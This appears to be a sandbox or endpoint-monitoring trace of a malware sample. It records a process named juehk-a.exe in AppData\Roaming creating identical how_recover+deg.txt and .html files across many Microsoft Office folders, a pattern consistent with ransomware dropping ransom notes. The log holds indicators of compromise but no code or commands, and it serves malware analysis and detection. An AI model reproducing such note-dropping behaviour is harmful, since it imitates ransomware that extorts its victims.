- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521207
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77199
- mode: created
- sequenceNumber: 1252
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521208
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77205
- mode: close
- sequenceNumber: 1253
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521208
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77276
- mode: created
- sequenceNumber: 1254
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521209
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77281
- mode: close
- sequenceNumber: 1255
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521209
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77288
- mode: created
- sequenceNumber: 1256
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521210
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77295
- mode: close
- sequenceNumber: 1257
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521210
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77303
- mode: created
- sequenceNumber: 1258
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231867
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77310
- mode: close
- sequenceNumber: 1259
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231867
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77320
- mode: created
- sequenceNumber: 1260
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521212
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77325
- mode: close
- sequenceNumber: 1261
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521212
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77331
- mode: created
- sequenceNumber: 1262
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521213
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77336
- mode: close
- sequenceNumber: 1263
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521213
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77572
- mode: created
- sequenceNumber: 1264
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942526
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77579
- mode: close
- sequenceNumber: 1265
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942526
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77587
- mode: created
- sequenceNumber: 1266
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521215
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77593
- mode: close
- sequenceNumber: 1267
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521215
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77604
- mode: created
- sequenceNumber: 1268
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521216
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77610
- mode: close
- sequenceNumber: 1269
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521216
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77639
- mode: created
- sequenceNumber: 1270
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231873
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77646
- mode: close
- sequenceNumber: 1271
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231873
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77655
- mode: created
- sequenceNumber: 1272
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231874
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77661
- mode: close
- sequenceNumber: 1273
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231874
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77715
- mode: created
- sequenceNumber: 1274
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231875
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77724
- mode: close
- sequenceNumber: 1275
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231875
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77777
- mode: created
- sequenceNumber: 1276
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521220
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77786
- mode: close
- sequenceNumber: 1277
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521220
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77797
- mode: created
- sequenceNumber: 1278
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521221
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77804
- mode: close
- sequenceNumber: 1279
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521221
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77813
- mode: created
- sequenceNumber: 1280
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521222
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77824
- mode: close
- sequenceNumber: 1281
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521222
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77829
- mode: created
- sequenceNumber: 1282
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231879
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77834
- mode: close
- sequenceNumber: 1283
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231879
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77844
- mode: created
- sequenceNumber: 1284
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231880
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77852
- mode: close
- sequenceNumber: 1285
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231880
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77935
- mode: created
- sequenceNumber: 1286
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860346363
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77943
- mode: close
- sequenceNumber: 1287
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860346363
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77975
- mode: created
- sequenceNumber: 1288
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883653193
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77980
- mode: close
- sequenceNumber: 1289
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883653193
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 77990
- mode: created
- sequenceNumber: 1290
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231882
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 77994
- mode: close
- sequenceNumber: 1291
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231882
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78057
- mode: created
- sequenceNumber: 1292
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521227
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78064
- mode: close
- sequenceNumber: 1293
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521227
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78112
- mode: created
- sequenceNumber: 1294
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521228
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78118
- mode: close
- sequenceNumber: 1295
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521228
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78128
- mode: created
- sequenceNumber: 1296
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521229
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78132
- mode: close
- sequenceNumber: 1297
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521229
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78141
- mode: created
- sequenceNumber: 1298
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521230
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78148
- mode: close
- sequenceNumber: 1299
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521230
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78190
- mode: created
- sequenceNumber: 1300
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521231
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78197
- mode: close
- sequenceNumber: 1301
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521231
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78214
- mode: created
- sequenceNumber: 1302
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521232
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78219
- mode: close
- sequenceNumber: 1303
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521232
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78224
- mode: created
- sequenceNumber: 1304
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521233
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78228
- mode: close
- sequenceNumber: 1305
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521233
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78237
- mode: created
- sequenceNumber: 1306
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521234
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78245
- mode: close
- sequenceNumber: 1307
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521234
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78253
- mode: created
- sequenceNumber: 1308
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521235
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78262
- mode: close
- sequenceNumber: 1309
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521235
- ntstatus: 0x0
- CreateOptions: 0x0
